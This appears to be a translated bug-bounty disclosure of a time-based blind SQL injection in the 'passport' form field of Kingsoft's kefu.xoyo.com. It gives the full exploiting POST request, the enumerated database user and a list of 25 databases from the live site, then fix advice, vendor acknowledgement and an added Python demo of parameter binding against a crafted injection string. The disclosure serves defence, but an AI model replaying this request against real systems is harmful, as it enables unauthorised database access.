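2015-06-05: Details reported to the vendor; awaiting vendor handling
2015-06-05: Vendor confirmed; details disclosed to the vendor only
2015-06-15: Details disclosed to core white hats and experts in related fields
2015-06-25: Details disclosed to regular white hats
2015-07-05: Details disclosed to intern white hats
2015-07-20: Details disclosed to the public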
MySQL blind injection on another Kingsoft Xoyo site
POST /index.php?act=fax HTTP/1.1
Host: kefu.xoyo.com
Proxy-Connection: keep-alive
Content-Length: 2389
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://kefu.xoyo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySkwzA9MatUHGBSPo
Referer: http://kefu.xoyo.com/index.php?act=fax
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: PHPSESSID=32478f1f838fa0be5ed14e44d1eee037; CNZZDATA30066337=cnzz_eid%3D707578972-1433470456-%26ntime%3D1433470456; CNZZDATA30066334=cnzz_eid%3D1351926095-1433472965-%26ntime%3D1433472965

------WebKitFormBoundarySkwzA9MatUHGBSPo
Content-Disposition: form-data; name="flag"

14334757571589823051
------WebKitFormBoundarySkwzA9MatUHGBSPo
Content-Disposition: form-data; name="productid"

13
------WebKitFormBoundarySkwzA9MatUHGBSPo
Content-Disposition: form-data; name="hid"


------WebKitFormBoundarySkwzA9MatUHGBSPo
Content-Disposition: form-data; name="product_business[]"

2
------WebKitFormBoundarySkwzA9MatUHGBSPo
Content-Disposition: form-data; name="passport"

admin*
------WebKitFormBoundarySkwzA9MatUHGBSPo
Content-Disposition: form-data; name="slt_gs_1"

1
------WebKitFormBoundarySkwzA9MatUHGBSPo
Content-Disposition: form-data; name="slt_gs_2"

1
------WebKitFormBoundarySkwzA9MatUHGBSPo
Content-Disposition: form-data; name="role"

admin
------WebKitFormBoundarySkwzA9MatUHGBSPo
Content-Disposition: form-data; name="level"

1
------WebKitFormBoundarySkwzA9MatUHGBSPo
Content-Disposition: form-data; name="realname"

admin
------WebKitFormBoundarySkwzA9MatUHGBSPo
Content-Disposition: form-data; name="tel"

18888888888
------WebKitFormBoundarySkwzA9MatUHGBSPo
Content-Disposition: form-data; name="original_tel"


------WebKitFormBoundarySkwzA9MatUHGBSPo
Content-Disposition: form-data; name="oldidnumber1"


------WebKitFormBoundarySkwzA9MatUHGBSPo
Content-Disposition: form-data; name="jsykt"


------WebKitFormBoundarySkwzA9MatUHGBSPo
Content-Disposition: form-data; name="jsczdd"


------WebKitFormBoundarySkwzA9MatUHGBSPo
Content-Disposition: form-data; name="tmqjd"


------WebKitFormBoundarySkwzA9MatUHGBSPo
Content-Disposition: form-data; name="jsykt"


------WebKitFormBoundarySkwzA9MatUHGBSPo
Content-Disposition: form-data; name="jsczdd"


------WebKitFormBoundarySkwzA9MatUHGBSPo
Content-Disposition: form-data; name="tmqjd"


------WebKitFormBoundarySkwzA9MatUHGBSPo
Content-Disposition: form-data; name="attachs1[]"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundarySkwzA9MatUHGBSPo
Content-Disposition: form-data; name="attachs1[]"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundarySkwzA9MatUHGBSPo
Content-Disposition: form-data; name="new_tel"

18888888888
------WebKitFormBoundarySkwzA9MatUHGBSPo
Content-Disposition: form-data; name="content"

content
------WebKitFormBoundarySkwzA9MatUHGBSPo--
The passport parameter is injectable (MySQL time-based blind injection).
current user: '[email protected].%'
current database: 'newkefu'
available databases [25]:
[*] `database`
[*] activesystem
[*] charge_logs
[*] design
[*] ekey_logs
[*] emailmarket
[*] emailmarket_monitor
[*] emailmarket_queue
[*] events
[*] gamedata
[*] gamedatash
[*] information_schema
[*] jx3_uninstall
[*] ke_survey
[*] mysql
[*] newkefu
[*] safe_logs
[*] test
[*] u88
[*] uds
[*] uds_test
[*] xd_data
[*] xd_mall
[*] xd_mall_new
[*] xoyo_tao
Filter the parameter.
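The suggested fix, sketched as an added example (not code from the report or from the vendor's site): the same passport lookup written with string concatenation, and with an allow-list check plus a bound parameter. SQLite stands in for MySQL so the block runs offline; the accounts table, its columns, the passport pattern and the sample values are assumptions.

```python
import re
import sqlite3

# Assumed account-name format; the report does not state the real one.
PASSPORT_RE = re.compile(r"[A-Za-z0-9_.@-]{1,64}")

def make_db():
    """In-memory stand-in for the site's account table (hypothetical schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE accounts (passport TEXT PRIMARY KEY, realname TEXT)")
    db.executemany("INSERT INTO accounts VALUES (?, ?)",
                   [("admin", "Admin"), ("alice", "Alice")])  # constructed rows
    return db

def lookup_concatenated(db, passport):
    """Unsafe: the form value is spliced into the SQL text and parsed as SQL."""
    sql = "SELECT realname FROM accounts WHERE passport = '" + passport + "'"
    return sorted(row[0] for row in db.execute(sql))

def lookup_bound(db, passport, validate=True):
    """Hardened: optional allow-list check, then the value is a bound parameter."""
    if validate and not PASSPORT_RE.fullmatch(passport):
        raise ValueError("passport has an unexpected format")
    rows = db.execute("SELECT realname FROM accounts WHERE passport = ?", (passport,))
    return sorted(row[0] for row in rows)

def demo():
    """Run one ordinary and one constructed hostile value through each lookup."""
    db = make_db()
    hostile = "nobody' OR '1'='1"  # constructed value containing SQL syntax
    results = {
        "concat_normal": lookup_concatenated(db, "admin"),
        "concat_hostile": lookup_concatenated(db, hostile),  # WHERE clause rewritten
        "bound_normal": lookup_bound(db, "admin"),
        "bound_hostile_unfiltered": lookup_bound(db, hostile, validate=False),
    }
    try:
        lookup_bound(db, hostile)
        results["filter_rejected"] = False
    except ValueError:
        results["filter_rejected"] = True
    return results

if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

Binding is what keeps the value out of the SQL grammar; the allow-list is a second layer that rejects malformed input before it reaches the database.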
Severity: Medium
Vulnerability Rank: 8
Confirmation time: 2015-06-05 15:07
Received, thank you very much!
None yet